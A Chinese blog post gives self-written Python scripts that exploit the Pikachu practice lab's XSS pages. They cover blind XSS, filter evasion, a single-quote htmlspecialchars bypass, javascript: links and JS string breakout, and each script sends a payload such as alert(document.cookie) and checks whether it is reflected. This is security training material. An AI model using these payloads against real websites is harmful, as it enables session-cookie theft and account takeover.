pikachu自编exp,xss之盲打,过滤,htmlspecialchars,href,js

xss之盲打

复制代码
#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显

过滤

htmlspecialchars

复制代码
#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。

href

复制代码
#href 输出:没过滤协议 → javascript: 执行代码

js

复制代码
#JS 输出:没转义引号 → 闭合字符串执行代码
复制代码
#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xssblind/xss_blind.php"

payload = "<script>alert(document.cookie)</script>"

resp = requests.post(url, data={"content":payload,"name":"name"})

print("[+] 注入完成! ")
print("[+] 检测是否注入成功: ",payload in resp.text)
复制代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_01.php"

payload = "<Script>alert(1)</Script>"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 完成注入")
print("[+] 查看是否注入成功: ",'<Script>' in resp.text)
复制代码
#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_02.php"

payload = "' onclick='alert(1)'"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看是否注入成功: ",payload in resp.text)
print("点击一下页面,弹出弹框")
复制代码
#href 输出:没过滤协议 → javascript: 执行代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_03.php"

payload = "javascript:alert(1);"

resp = requests.get(url, params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看注入是否成功:",payload in resp.text )
print("[+] 点击页面的链接")
print(f"[+] 或者点击:{url}?message={payload}")
复制代码
#JS 输出:没转义引号 → 闭合字符串执行代码
import requests

url = "http://192.168.8.1/pikachu-master/vul/xss/xss_04.php"

payload =  "';alert(1);//"

resp = requests.get(url,params={"message":payload,"submit":"submit"})

print("[+] 注入完成")
print("[+] 查看是否注入成功: ","alert" in resp.text)
相关推荐
计算机魔术师3 分钟前
烧掉2780亿美元还不够?OpenAI的资本豪赌让人头皮发麻
前端
IT_陈寒1 小时前
Java线程池用错参数,我的服务居然悄悄崩溃了
前端·人工智能·后端
卡布鲁1 小时前
React useMemo 与 useCallback 完全指南:原理、场景与避坑
前端·react.js
子非鱼a1 小时前
【XSS】乌托邦·王的实验室
html·xss
碳基修炼1 小时前
排查记:本地 devServer 是 http,浏览器却把 302 重定向升级成了 https
前端·http
步行cgn1 小时前
Spring p 命名空间注入详解
java·前端·spring
何何____2 小时前
Vue 生命周期详解
前端·javascript
江米小枣tonylua2 小时前
TypeScript 全面の拥抱 !Prisma 8 + Electron 升级实战
前端
闪耀之光M782 小时前
npm命令解析
前端
咸鱼老弟2 小时前
AI Agent 的"自主性悖论"——为什么给它的自由度越大,越要配一套更硬的护栏
前端·人工智能